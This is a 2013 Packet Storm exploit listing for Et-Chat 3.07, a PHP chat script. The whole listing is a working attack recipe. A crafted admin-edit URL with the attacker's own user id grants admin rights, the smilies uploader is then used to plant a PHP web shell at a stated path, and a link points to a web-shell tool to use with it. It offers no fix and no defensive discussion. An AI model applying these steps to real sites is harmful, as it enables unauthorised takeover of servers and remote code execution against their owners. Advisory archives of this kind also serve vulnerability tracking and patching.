Et-Chat 3.07 Privilege Escalation / Shell Upload

2013-06-18T00:00:00
ID PACKETSTORM:122072
Type packetstorm
Reporter Mr.XpR
Modified 2013-06-18T00:00:00

Description

                                        
                                            `# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution  
  
# Exploit Author: MR.XpR  
  
# Script Download : http://et-chat.ir/up/et_chat_v307.zip  
  
# Risk : Normal  
  
# Platforms : PHP  
  
# Tested on: 7 , KAli , Vista  
  
# Date : 2013  
  
<------------------------------------------>  
  
-==========<RcE>==========-  
  
  
# How does :  
  
This error occurs due to keep cookies  
  
  
# Exploit :  
  
  
/?AdminRegUserEdit&[user or admin]&id=[Parameter]  
  
/?AdminRegUserEdit&admin&id=[Parameter]  
  
  
# p0c :  
  
  
get the user id and replace to Parameter  
  
For example, my user id is 4  
  
http://site.com/chat/?AdminRegUserEdit&admin&id=4  
  
next u are a admin user  
  
  
  
-==========<Uploader>==========-  
  
# For uploading sh3ll go to  
  
/?AdminInsertSmilies <====- Uploader  
  
http://site.com/chat/?AdminInsertSmilies  
  
# your shell Should be less than 15 KB  
  
Patch your sh3ll from :  
  
http://site.com/smilies/sh3ll.php  
  
  
  
-=====> IRH mini sheller For Use To this Exploit : <=====-  
  
  
# Download :  
  
http://uploaderx.persiangig.com/IRH_MINI_Sheller_V1/IRH-Mini-Sheller.zip  
  
# D3mo video :  
  
http://uploaderx.persiangig.com/Et_RCe_Rfu.zip  
  
# for more security :  
  
http://iranhack.org/acc/thread-1082.html  
  
  
<------------------------------------------>  
  
Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s ,  
Farbod Ezrail , @3is , 3nist3in , Siamak.Black  
  
Greetz : r0bb3r68 , M.R.S.CO , Mя.V3nd3tt4 , N4BIL , Ali_Sedaghat ,  
MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH  
`